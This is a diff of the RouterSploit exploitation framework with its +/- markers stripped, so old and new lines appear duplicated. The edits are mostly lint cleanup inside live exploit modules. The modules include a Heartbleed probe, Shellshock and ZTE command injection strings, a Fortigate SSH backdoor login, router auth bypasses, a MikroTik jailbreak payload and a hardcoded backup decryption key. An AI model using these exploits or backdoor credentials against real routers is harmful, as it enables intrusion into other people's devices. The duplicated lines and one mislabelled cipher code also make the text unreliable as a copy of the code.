0xc00a, # TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
0xc022, # TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA
0xc021, # TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA
0x0039, # TLS_DHE_RSA_WITH_AES_256_CBC_SHA
0x0038, # TLS_DHE_DSS_WITH_AES_256_CBC_SHA
0x0088, # TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
0x0087, # TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA
0x0087, # TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
0xc00f, # TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
0x0035, # TLS_RSA_WITH_AES_256_CBC_SHA
0x0084, # TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
0xc012, # TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
0xc008, # TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
0xc01c, # TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA
0xc01b, # TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA
0x0016, # TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
0x0013, # TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA
0xc00d, # TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
0xc003, # TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
0x000a, # TLS_RSA_WITH_3DES_EDE_CBC_SHA
0xc013, # TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
0xc009, # TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
0xc01f, # TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA
0xc01e, # TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA
0x0033, # TLS_DHE_RSA_WITH_AES_128_CBC_SHA
0x0032, # TLS_DHE_DSS_WITH_AES_128_CBC_SHA
0x009a, # TLS_DHE_RSA_WITH_SEED_CBC_SHA
0x0099, # TLS_DHE_DSS_WITH_SEED_CBC_SHA
0x0045, # TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
0x0044, # TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA
0xc00e, # TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
0xc004, # TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
0x002f, # TLS_RSA_WITH_AES_128_CBC_SHA
0x0096, # TLS_RSA_WITH_SEED_CBC_SHA
0x0041, # TLS_RSA_WITH_CAMELLIA_128_CBC_SHA
0xc011, # TLS_ECDHE_RSA_WITH_RC4_128_SHA
0xc007, # TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
0xc00c, # TLS_ECDH_RSA_WITH_RC4_128_SHA
0xc002, # TLS_ECDH_ECDSA_WITH_RC4_128_SHA
0x0005, # TLS_RSA_WITH_RC4_128_SHA
0x0004, # TLS_RSA_WITH_RC4_128_MD5
0x0015, # TLS_DHE_RSA_WITH_DES_CBC_SHA
0x0012, # TLS_DHE_DSS_WITH_DES_CBC_SHA
0x0009, # TLS_RSA_WITH_DES_CBC_SHA
0x0014, # TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
0x0011, # TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA
0x0008, # TLS_RSA_EXPORT_WITH_DES40_CBC_SHA
0x0006, # TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5
0x0003, # TLS_RSA_EXPORT_WITH_RC4_40_MD5
0x00ff # Unknown
0xc014, # TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
0xc00a, # TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
0xc022, # TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA
0xc021, # TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA
0x0039, # TLS_DHE_RSA_WITH_AES_256_CBC_SHA
0x0038, # TLS_DHE_DSS_WITH_AES_256_CBC_SHA
0x0088, # TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
0x0087, # TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA
0x0087, # TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
0xc00f, # TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
0x0035, # TLS_RSA_WITH_AES_256_CBC_SHA
0x0084, # TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
0xc012, # TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
0xc008, # TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
0xc01c, # TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA
0xc01b, # TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA
0x0016, # TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
0x0013, # TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA
0xc00d, # TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
0xc003, # TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
0x000a, # TLS_RSA_WITH_3DES_EDE_CBC_SHA
0xc013, # TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
0xc009, # TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
0xc01f, # TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA
0xc01e, # TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA
0x0033, # TLS_DHE_RSA_WITH_AES_128_CBC_SHA
0x0032, # TLS_DHE_DSS_WITH_AES_128_CBC_SHA
0x009a, # TLS_DHE_RSA_WITH_SEED_CBC_SHA
0x0099, # TLS_DHE_DSS_WITH_SEED_CBC_SHA
0x0045, # TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
0x0044, # TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA
0xc00e, # TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
0xc004, # TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
0x002f, # TLS_RSA_WITH_AES_128_CBC_SHA
0x0096, # TLS_RSA_WITH_SEED_CBC_SHA
0x0041, # TLS_RSA_WITH_CAMELLIA_128_CBC_SHA
0xc011, # TLS_ECDHE_RSA_WITH_RC4_128_SHA
0xc007, # TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
0xc00c, # TLS_ECDH_RSA_WITH_RC4_128_SHA
0xc002, # TLS_ECDH_ECDSA_WITH_RC4_128_SHA
0x0005, # TLS_RSA_WITH_RC4_128_SHA
0x0004, # TLS_RSA_WITH_RC4_128_MD5
0x0015, # TLS_DHE_RSA_WITH_DES_CBC_SHA
0x0012, # TLS_DHE_DSS_WITH_DES_CBC_SHA
0x0009, # TLS_RSA_WITH_DES_CBC_SHA
0x0014, # TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
0x0011, # TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA
0x0008, # TLS_RSA_EXPORT_WITH_DES40_CBC_SHA
0x0006, # TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5
0x0003, # TLS_RSA_EXPORT_WITH_RC4_40_MD5
0x00ff # Unknown
)
SSL_RECORD_HEADER_SIZE = 0x05
HANDSHAKE_RECORD_TYPE = 0x16
HEARTBEAT_RECORD_TYPE = 0x18
ALERT_RECORD_TYPE = 0x15
HANDSHAKE_SERVER_HELLO_TYPE = 0x02
HANDSHAKE_CERTIFICATE_TYPE = 0x0b
HANDSHAKE_KEY_EXCHANGE_TYPE = 0x0c
HANDSHAKE_SERVER_HELLO_DONE_TYPE = 0x0e
SSL_RECORD_HEADER_SIZE = 0x05
HANDSHAKE_RECORD_TYPE = 0x16
HEARTBEAT_RECORD_TYPE = 0x18
ALERT_RECORD_TYPE = 0x15
HANDSHAKE_SERVER_HELLO_TYPE = 0x02
HANDSHAKE_CERTIFICATE_TYPE = 0x0b
HANDSHAKE_KEY_EXCHANGE_TYPE = 0x0c
HANDSHAKE_SERVER_HELLO_DONE_TYPE = 0x0e
TLS_VERSION = {
"SSLv3": 0x0300,
......@@ -142,15 +142,16 @@ class Exploit(TCPClient):
elif char not in self.printable:
data += "."
else:
data += char
data += char
clean_data = ""
tmp_b = 0
for item in re.finditer(r"(\.){400,}", data):
a, b = item.span()
a, b = item.span()
clean_data += data[tmp_b:a]
tmp_b = b
clean_data += "................................ repeated {} times ................................".format(b-a-64)
repeated = b - a - 64
clean_data += "................................ repeated {} times ................................".format(repeated)
clean_data += data[b:]
print_info(clean_data)
......@@ -159,7 +160,7 @@ class Exploit(TCPClient):
@mute
def check(self):
if self.bleed():
if self.bleed():
return True
return False
......@@ -188,7 +189,7 @@ class Exploit(TCPClient):
self.tcp_close(self.tcp_client)
return heartbeat_data
def establish_connect(self):
self.tcp_client = self.tcp_connect()
......@@ -224,7 +225,7 @@ class Exploit(TCPClient):
# Stop once we receive SERVER_HELLO_DONE
if handshakes and handshakes[-1]["type"] == self.HANDSHAKE_SERVER_HELLO_DONE_TYPE:
server_done = True
break
break
remaining_data = self.get_ssl_record()
......@@ -268,12 +269,12 @@ class Exploit(TCPClient):
def parse_server_hello(self, data):
version = unpack(">H", data[:2])[0]
print_status("\t\tServer Hello Version: 0x{:x}".format(version))
random = unpack(">" + "B"*32, data[2:34])
random = unpack(">" + "B" * 32, data[2:34])
random_hex = str(binascii.hexlify(bytes(random)), "utf-8")
print_status("\t\tServer Hello random data: {}".format(random_hex))
session_id_length = unpack(">B", data[34:35])[0]
print_status("\t\tServer Hello Session ID length: {}".format(session_id_length))
session_id = unpack(">" + "B"*session_id_length, data[35: 35 + session_id_length])
session_id = unpack(">" + "B" * session_id_length, data[35: 35 + session_id_length])
session_id_hex = str(binascii.hexlify(bytes(session_id)), "utf-8")
print_status("\t\tServer Hello session id: {}".format(session_id_hex))
......@@ -282,28 +283,27 @@ class Exploit(TCPClient):
print_status("\t\tCertificates length: {}".format(cert_len))
print_status("\t\tData length: {}".format(len(data)))
#contains multiple certs
# contains multiple certs
already_read = 3
cert_counter = 0
while already_read < cert_len:
cert_counter += 1
# get single certificate length
single_cert_len_padding, single_cert_len = unpack(">BH", data[already_read:already_read+3])
single_cert_len_padding, single_cert_len = unpack(">BH", data[already_read: already_read + 3])
print_status("\t\tCertificate {}".format(cert_counter))
print_status("\t\t\tCertificate {}: Length: {}".format(cert_counter, single_cert_len))
certificate_data = data[(already_read + 3): (already_read+3+single_cert_len)]
certificate_data = data[(already_read + 3): (already_read + 3 + single_cert_len)]
cert = x509.load_der_x509_certificate(certificate_data, default_backend())
print_status("\t\t\tCertificate {}: {}".format(cert_counter, cert))
already_read = already_read + single_cert_len + 3
def get_ssl_record(self):
hdr = self.tcp_recv(self.tcp_client, self.SSL_RECORD_HEADER_SIZE)
if hdr:
length = unpack(">BHH", hdr)[2]
data = self.tcp_recv(self.tcp_client, length)
data = self.tcp_recv(self.tcp_client, length)
hdr += data
return hdr
......@@ -315,12 +315,12 @@ class Exploit(TCPClient):
time_epoch = int(time())
cipher_suits_len = len(self.CIPHER_SUITS)
hello_data = pack(">H", self.TLS_VERSION[self.tls_version]) # Version TLS
hello_data += pack(">L", time_epoch) # Time in epoch format
hello_data = pack(">H", self.TLS_VERSION[self.tls_version]) # Version TLS
hello_data += pack(">L", time_epoch) # Time in epoch format
hello_data += bytes(utils.random_text(28), "utf-8") # Random
hello_data += b"\x00" # Session ID length
hello_data += pack(">H", cipher_suits_len * 2) # Cipher Suits Length (102)
hello_data += pack(">" + "H" * cipher_suits_len, *self.CIPHER_SUITS) # Cipher Suites
hello_data += pack(">" + "H" * cipher_suits_len, *self.CIPHER_SUITS) # Cipher Suites
hello_data += b"\x01" # Compression methods length (1)
hello_data += b"\x00" # Compression methods: null
......
routersploit/modules/exploits/generic/shellshock.py
......@@ -44,8 +44,6 @@ class Exploit(HTTPClient):
def execute(self, cmd):
marker = utils.random_text(32)
url = "{}:{}{}".format(self.target, self.port, self.path)
injection = self.valid.replace("{{marker}}", marker).replace("{{cmd}}", cmd)
headers = {
......@@ -76,8 +74,6 @@ class Exploit(HTTPClient):
cmd = "echo $(({}-1))".format(number)
marker = utils.random_text(32)
url = "{}:{}{}".format(self.target, self.port, self.path)
for payload in self.payloads:
injection = payload.replace("{{marker}}", marker).replace("{{cmd}}", cmd)
......
routersploit/modules/exploits/routers/2wire/gateway_auth_bypass.py
......@@ -48,8 +48,6 @@ class Exploit(HTTPClient):
return False # target is not vulnerable
# checking if authentication can be bypassed
url = "{}:{}/xslt".format(self.target, self.port)
response = self.http_request(
method="GET",
path="/xslt",
......
routersploit/modules/exploits/routers/3com/imc_info_disclosure.py
......@@ -63,7 +63,7 @@ class Exploit(HTTPClient):
continue
if any(map(lambda x: x in response.text, ["report.db.server.name", "report.db.server.sa.pass", "report.db.server.user.pass"])):
self.valid = path
self.valid = path
return True # target is vulnerable
return False # target not vulnerable
routersploit/modules/exploits/routers/3com/officeconnect_rce.py
......@@ -44,7 +44,7 @@ class Exploit(HTTPClient):
def check(self):
response1 = self.http_request(
method="GET",
path="/utility.cgi?testType=1&IP=aaa",
path="/utility.cgi?testType=1&IP=aaa",
)
if response1 is None:
return False # target is not vulnerable
......
routersploit/modules/exploits/routers/billion/billion_7700nr4_password_disclosure.py
......@@ -46,7 +46,7 @@ class Exploit(HTTPClient):
try:
print_status("Trying to base64 decode")
password = base64.b64decode(res[0])
except:
except Exception:
print_error("Exploit failed - could not decode password")
return
......
routersploit/modules/exploits/routers/cisco/catalyst_2960_rocem.py
......@@ -178,7 +178,7 @@ class Exploit(TCPClient):
print_status("Connection OK")
print_status("Received bytes from telnet service: {}".format(repr(s.recv(1024))))
except:
except Exception:
print_error("Connection failed")
return
......@@ -201,7 +201,7 @@ class Exploit(TCPClient):
try:
t = telnetlib.Telnet(self.target, int(self.telnet_port))
t.interact()
except:
except Exception:
print_error("Exploit failed")
else:
print_status("Check if Telnet authentication was set back")
......
routersploit/modules/exploits/routers/cisco/firepower_management60_path_traversal.py
......@@ -89,7 +89,7 @@ class Exploit(HTTPClient):
path="/login.cgi?logout=1",
data=data,
allow_redirects=False,
timeout=30,
timeout=30,
session=self.session
)
......
routersploit/modules/exploits/routers/cisco/firepower_management60_rce.py
......@@ -114,15 +114,12 @@ class Exploit(HTTPClient, SSHClient):
"file": (sh_name, payload)
}
try:
self.http_request(
method="POST",
path="/DetectionPolicy/rules/rulesimport.cgi",
files=multipart_form_data,
session=self.session
)
except:
pass
self.http_request(
method="POST",
path="/DetectionPolicy/rules/rulesimport.cgi",
files=multipart_form_data,
session=self.session
)
return
......
routersploit/modules/exploits/routers/comtrend/ct_5361t_password_disclosure.py
......@@ -75,7 +75,7 @@ class Exploit(HTTPClient):
if len(res):
try:
b64decode(res[0]) # checking if data is base64 encoded
except:
except Exception:
return False # target is not vulnerable
else:
return False # target is not vulnerable
......
routersploit/modules/exploits/routers/dlink/dcs_930l_auth_rce.py
......@@ -61,7 +61,7 @@ class Exploit(HTTPClient):
"SystemCommand": "ls",
"ConfigSystemCommand": "Save"
}
response = self.http_request(
method="POST",
path="/setSystemCommand",
......
routersploit/modules/exploits/routers/dlink/dir_300_645_815_upnp_rce.py
......@@ -67,7 +67,7 @@ class Exploit(UDPClient):
sock.send(buf)
response = sock.recv(65535)
sock.close()
except:
except Exception:
return False # target is not vulnerable
if "Linux, UPnP/1.0, DIR-" in response:
......
routersploit/modules/exploits/routers/dlink/dir_815_850l_rce.py
from routersploit.core.exploit import *
from routersploit.core.udp.udp_client import UDPClient
class Exploit(UDPClient):
__info__ = {
"name": "D-Link DIR-815 & DIR-850L RCE",
......
routersploit/modules/exploits/routers/dlink/dir_850l_creds_disclosure.py
......@@ -25,7 +25,6 @@ class Exploit(HTTPClient):
target = OptIP("", "Target IPv4 or IPv6 address")
port = OptPort(80, "Target HTTP port")
def run(self):
self.credentials = []
......
routersploit/modules/exploits/routers/dlink/dns_320l_327l_rce.py
......@@ -63,7 +63,7 @@ class Exploit(HTTPClient):
"{};echo ffffffffffffffff;".format(cmd)
response = self.http_request(
method="GET",
method="GET",
path=path
)
if response is None:
......
routersploit/modules/exploits/routers/dlink/dsl_2750b_info_disclosure.py
......@@ -12,7 +12,7 @@ class Exploit(HTTPClient):
"Alvaro Folgado", # vulnerability discovery
"Jose Rodriguez", # vulnerability discovery
"Ivan Sanz", # vulnerability discovery
"Marcin Bury <marcin[at]threat9.com>", # routersploit module,
"Marcin Bury <marcin[at]threat9.com>", # routersploit module,
),
"references": (
"http://seclists.org/fulldisclosure/2015/May/129",
......
routersploit/modules/exploits/routers/dlink/dsl_2750b_rce.py
......@@ -9,7 +9,7 @@ class Exploit(HTTPClient):
"description": "Module exploits remote code execution vulnerability in D-Link DSL-2750B devices. ",
"authors": (
"p@ql", # vulnerability discovery
"Marcin Bury <marcin[at]threat9.com>", # routersploit module,
"Marcin Bury <marcin[at]threat9.com>", # routersploit module,
),
"references": (
"http://seclists.org/fulldisclosure/2016/Feb/53",
......@@ -45,7 +45,7 @@ class Exploit(HTTPClient):
if response and "DSL-2750B" in response.text:
version = re.findall(r"AYECOM_FWVER=\"(.*?)\";", response.text)
if version:
if utils.Version("1.01") <= utils.Version(version[0]) <= utils.Version("1.03"):
if utils.Version("1.01") <= utils.Version(version[0]) <= utils.Version("1.03"):
return True # target is vulnerable
return False # target is not vulnerable
routersploit/modules/exploits/routers/dlink/dsp_w110_rce.py
......@@ -44,7 +44,7 @@ class Exploit(HTTPClient):
method="GET",
path="/",
cookies=cookies
)
)
return ""
@mute
......
routersploit/modules/exploits/routers/dlink/dvg_n5402sp_path_traversal.py
from routersploit.core.exploit import *
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
......
routersploit/modules/exploits/routers/dlink/dwl_3200ap_password_disclosure.py
......@@ -3,7 +3,6 @@ from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
class Exploit(HTTPClient):
__info__ = {
"name": "D-Link DWL-3200AP Password Disclosure",
......
routersploit/modules/exploits/routers/dlink/dwr_932b_backdoor.py
......@@ -35,7 +35,7 @@ class Exploit(TCPClient, TelnetClient):
try:
sock.sendto(b"HELODBG", (self.target, 39889))
response = sock.recv(1024)
except:
except Exception:
pass
sock.close()
......@@ -47,7 +47,7 @@ class Exploit(TCPClient, TelnetClient):
try:
tn = telnetlib.Telnet(self.target, self.telnet_port)
tn.interact()
except:
except Exception:
print_error("Exploit failed - could not connect to the telnet service")
else:
print_error("Exploit failed - target seems to be not vulnerable")
......@@ -64,7 +64,7 @@ class Exploit(TCPClient, TelnetClient):
if "Hello" in response:
sock.sendto(b"BYEDBG", (self.target, 39889))
return True # target is vulnerable
except:
except Exception:
pass
return False # target is not vulnerable
routersploit/modules/exploits/routers/dlink/multi_hedwig_cgi_exec.py
......@@ -75,7 +75,7 @@ class Exploit(HTTPClient):
@mute
def check(self):
fingerprint = utils.random_text(10)
cmd = "echo {}".format(fingerprint)
cmd = "echo {}".format(fingerprint)
response = self.execute(cmd)
......
routersploit/modules/exploits/routers/dlink/multi_hnap_rce.py
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
class Exploit(HTTPClient):
__info__ = {
"name": "D-Link Multi HNAP RCE",
......@@ -52,7 +53,7 @@ class Exploit(HTTPClient):
self.http_request(
method="POST",
path="/HNAP1/",
path="/HNAP1/",
headers=headers
)
return ""
......
routersploit/modules/exploits/routers/fortinet/fortigate_os_backdoor.py
......@@ -36,7 +36,7 @@ class Exploit(SSHClient):
client.connect(self.target, self.port, username='', allow_agent=False, look_for_keys=False)
except paramiko.ssh_exception.SSHException:
pass
except:
except Exception:
print_error("Exploit Failed - SSH Service is down")
return
......@@ -45,7 +45,7 @@ class Exploit(SSHClient):
trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
except paramiko.ssh_exception.AuthenticationException:
pass
except:
except Exception:
print_status("Error with Existing Session. Wait few minutes.")
return
......@@ -54,7 +54,7 @@ class Exploit(SSHClient):
print_success("Exploit succeeded")
ssh_interactive(client)
except:
except Exception:
print_error("Exploit failed")
return
......@@ -67,7 +67,7 @@ class Exploit(SSHClient):
client.connect(self.target, self.port, username='', allow_agent=False, look_for_keys=False)
except paramiko.ssh_exception.SSHException:
pass
except:
except Exception:
return False # target is not vulnerable
trans = client.get_transport()
......@@ -75,12 +75,12 @@ class Exploit(SSHClient):
trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
except paramiko.ssh_exception.AuthenticationException:
pass
except:
except Exception:
return None # could not verify
try:
trans.auth_interactive(username='Fortimanager_Access', handler=self.custom_handler)
except:
except Exception:
return False # target is not vulnerable
return True # target is vulnerable
......
routersploit/modules/exploits/routers/huawei/e5331_mifi_info_disclosure.py
......@@ -32,7 +32,7 @@ class Exploit(HTTPClient):
method="GET",
path="/api/wlan/security-settings",
)
if response is None:
return
......
routersploit/modules/exploits/routers/huawei/hg520_info_dislosure.py
......@@ -72,7 +72,7 @@ class Exploit(UDPClient):
try:
print_status("Waiting for response")
response = sock.recv(1024)
except:
except Exception:
print_error("Exploit failed - device seems to be not vulnerable")
return
......@@ -88,7 +88,7 @@ class Exploit(UDPClient):
try:
response = sock.recv(1024)
except:
except Exception:
return False # target is not vulnerable
if len(response):
......
routersploit/modules/exploits/routers/ipfire/ipfire_oinkcode_rce.py
......@@ -54,7 +54,7 @@ class Exploit(HTTPClient):
"ACTION2": "snort"
}
response = self.http_request(
self.http_request(
method="POST",
path="/cgi-bin/ids.cgi",
headers=headers,
......@@ -81,7 +81,7 @@ class Exploit(HTTPClient):
version = res[0][0]
update = int(res[0][1])
if Version(version) <= Version("2.19") and udpate <= 110:
if Version(version) <= Version("2.19") and update <= 110:
return True # target is vulnerable
return False # target is not vulnerable
routersploit/modules/exploits/routers/mikrotik/routeros_jailbreak.py
import re
from struct import pack, unpack
from routersploit.core.exploit import *
from routersploit.core.ssh.ssh_client import SSHClient
from routersploit.core.ssh.ssh_client import SSHClient
class Exploit(SSHClient):
......@@ -42,11 +42,11 @@ class Exploit(SSHClient):
if self.backup_restore(backup):
print_success("Jailbreak was (likely) successful.")
print_success("Linux mode can be accessed via telnet using: devel/{}".format(self.password))
else:
else:
print_error("Unable to apply patched configuration")
else:
print_error("Unable to export current configuration")
@mute
def check(self):
self.ssh_client = self.ssh_login(self.username, self.password)
......@@ -54,7 +54,7 @@ class Exploit(SSHClient):
if self.ssh_client:
output = self.ssh_execute(self.ssh_client, "/system resource print")
res = re.findall(b"version: (.+?) ", output)
res = re.findall(b"version: (.+?) ", output)
if res:
version = str(res[0], "utf-8")
if "rc" in version:
......@@ -87,7 +87,7 @@ class Exploit(SSHClient):
matchsize, = unpack("<I", backup[4:8])
if matchsize != realsize:
print_error("File is damaged. Aborting...")
return False
return False
# first we write our payload
payload = (
......@@ -95,7 +95,7 @@ class Exploit(SSHClient):
b"\x6E\x6F\x76\x61\x2F\x65\x74\x63\x2F\x64\x65\x76\x65\x6C\x2D"
b"\x6C\x6F\x67\x69\x6E\x2F\x00\x00\x00\x00\x00\x00\x00\x00"
)
matchsize += len(payload)
matchsize += len(payload)
backup = backup[:4] + pack("<I", matchsize) + backup[8:] + payload
print_status("Patching done")
......@@ -110,6 +110,6 @@ class Exploit(SSHClient):
else:
output = self.ssh_execute(self.ssh_client, "/system backup load name=\"backup.backup\"")
if b"configuration restored" in output:
return True
return True
return False
routersploit/modules/exploits/routers/multi/gpon_home_gateway_rce.py
import re
from time import sleep
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
from routersploit.core.http.http_client import HTTPClient
class Exploit(HTTPClient):
......
routersploit/modules/exploits/routers/multi/misfortune_cookie.py
......@@ -142,9 +142,9 @@ class Exploit(HTTPClient):
if response is not None and response.status_code <= 302:
print_success(
"Seems good but check "
+ "{}:{}".format(self.target, self.port)
+ " using your browser to verify if authentication is disabled or not."
"Seems good but check " +
"{}:{} ".format(self.target, self.port) +
"using your browser to verify if authentication is disabled or not."
)
return True
else:
......
routersploit/modules/exploits/routers/multi/rom0.py
......@@ -88,7 +88,7 @@ class Exploit(HTTPClient):
response = self.http_request(
method="GET",
path="/rom-0",
)
)
if response is not None \
and response.status_code == 200 \
......
routersploit/modules/exploits/routers/technicolor/tc7200_password_disclosure_v2.py
......@@ -63,9 +63,9 @@ class Exploit(HTTPClient):
@staticmethod
def decrypt_backup(backup):
key = binascii.unhexlify('000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F')
l = (len(backup) / 16) * 16
length = (len(backup) / 16) * 16
cipher = AES.new(key, AES.MODE_ECB)
plain = cipher.decrypt(backup[0:l])
plain = cipher.decrypt(backup[0:length])
return plain
@mute
......
routersploit/modules/exploits/routers/technicolor/tg784_authbypass.py
import re
from io import StringIO
from routersploit.core.exploit import *
from routersploit.core.ftp.ftp_client import FTPClient
......@@ -57,7 +56,6 @@ class Exploit(FTPClient):
return False
def get_credentials(self):
print_status("Trying FTP authentication with Username: {} and Password: {}".format(self.username,
self.password))
......
routersploit/modules/exploits/routers/thomson/twg849_info_disclosure.py
......@@ -20,7 +20,7 @@ class Exploit(SNMPClient):
target = OptIP("", "Target IPv4 or IPv6 address")
port = OptPort(161, "Target SNMP port")
verbosity = OptBool("false", "Enable verbose output: true/false")
def __init__(self):
......
routersploit/modules/exploits/routers/tplink/wdr842nd_wdr842n_configure_disclosure.py
......@@ -56,9 +56,9 @@ class Exploit(HTTPClient):
return passwd
def parse(self, data):
l = data.split(b'\r\n')
del l[0]
for item in l:
parts = data.split(b'\r\n')
del parts[0]
for item in parts:
try:
if 'authKey' in item:
authKey = item.split()[1]
......@@ -66,7 +66,7 @@ class Exploit(HTTPClient):
cPskSecret = item.split()[1]
if 'cUsrPIN' in item:
cUsrPIN = item.split()[1]
except:
except Exception:
pass
return authKey, cPskSecret, cUsrPIN
......
routersploit/modules/exploits/routers/zte/zxv10_rce.py
......@@ -42,10 +42,9 @@ class Exploit(HTTPClient):
print_error("Exploit failed - target seems to be not vulnerable")
def execute(self, cmd):
path = "/getpage.gch?pid=1002&nextpage=manager_dev_ping_t.gch&Host=;echo $({})&NumofRepeat=1&" \
"DataBlockSize=64&DiagnosticsState=Requested&IF_ACTION=new&IF_IDLE=submit".format(cmd)
url = "{}:{}{}".format(self.target, self.port, path)
try:
response = self.http_request(
method="GET",
......@@ -73,7 +72,7 @@ class Exploit(HTTPClient):
res = res1 + res2
if res[0] != "</textarea>":
return res[0]
except:
except Exception:
pass
return ""
......@@ -85,7 +84,7 @@ class Exploit(HTTPClient):
path="/template.gch",
session=self.session
)
except:
except Exception:
return
# Check for Model Name
......@@ -140,7 +139,7 @@ class Exploit(HTTPClient):
if "Username" not in response.text and "Password" not in response.text:
print_success("Successful authentication")
return True
except:
except Exception:
pass
return False
......
routersploit/modules/exploits/routers/zyxel/p660hn_t_v2_rce.py
......@@ -76,7 +76,7 @@ class Exploit(HTTPClient):
def login(self):
credentials = base64.encode("{}:{}".format(self.username, self.password))
url = "/cgi-bin/index.asp?" + credentials
path = "/cgi-bin/index.asp?" + credentials
data = {
"Loginuser": "supervisor",
......
routersploit/modules/generic/bluetooth/btle_write.py
......@@ -20,7 +20,6 @@ class Exploit(BTLEClient):
data = OptString("41424344", "Data (in hex format)")
buffering = OptBool("true", "Buffering enabled: true/false. Results in real time.")
def run(self):
try:
data = bytes.fromhex(self.data)
......
routersploit/modules/payloads/perl/bind_tcp.py
from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload
......
routersploit/modules/payloads/perl/reverse_tcp.py
from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin
......
routersploit/modules/payloads/php/reverse_tcp.py
from base64 import b64encode
from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin
......
routersploit/modules/payloads/python/bind_tcp.py
from base64 import b64encode
from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload
......
routersploit/modules/payloads/python/reverse_tcp.py
from base64 import b64encode
from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin
......
routersploit/modules/scanners/autopwn.py
......@@ -98,27 +98,27 @@ class Exploit(Exploit):
break
else:
exploit.target = self.target
if exploit.target_protocol == Protocol.HTTP:
exploit.port = self.http_port
if self.http_ssl:
exploit.ssl = "true"
exploit.target_protocol = Protocol.HTTPS
elif exploit.target_protocol is Protocol.FTP:
exploit.port = self.ftp_port
if self.ftp_ssl:
exploit.ssl = "true"
exploit.target_protocol = Protocol.FTPS
elif exploit.target_protocol is Protocol.TELNET:
exploit.port = self.telnet_port
# elif exploit.target_protocol not in ["tcp", "udp"]:
# exploit.target_protocol = "custom"
response = exploit.check()
if response is True:
print_info("\033[92m[+]\033[0m", "{}:{} {} {} is vulnerable".format(
exploit.target, exploit.port, exploit.target_protocol, exploit))
......@@ -136,7 +136,7 @@ class Exploit(Exploit):
try:
module = data.next()
exploit = module()
generic = False
if exploit.__module__.startswith("routersploit.modules.creds.generic"):
if exploit.__module__.endswith("default"):
......@@ -151,13 +151,13 @@ class Exploit(Exploit):
exploit.verbosity = "false"
exploit.stop_on_success = "false"
exploit.threads = self.threads
if exploit.target_protocol == Protocol.HTTP:
exploit.port = self.http_port
if self.http_ssl:
exploit.ssl = "true"
exploit.target_protocol = Protocol.HTTPS
elif generic:
if exploit.target_protocol is Protocol.HTTP:
exploit.port = self.http_port
......@@ -171,17 +171,17 @@ class Exploit(Exploit):
if self.ftp_ssl:
exploit.ssl = "true"
exploit.target_protocol = Protocol.FTPS
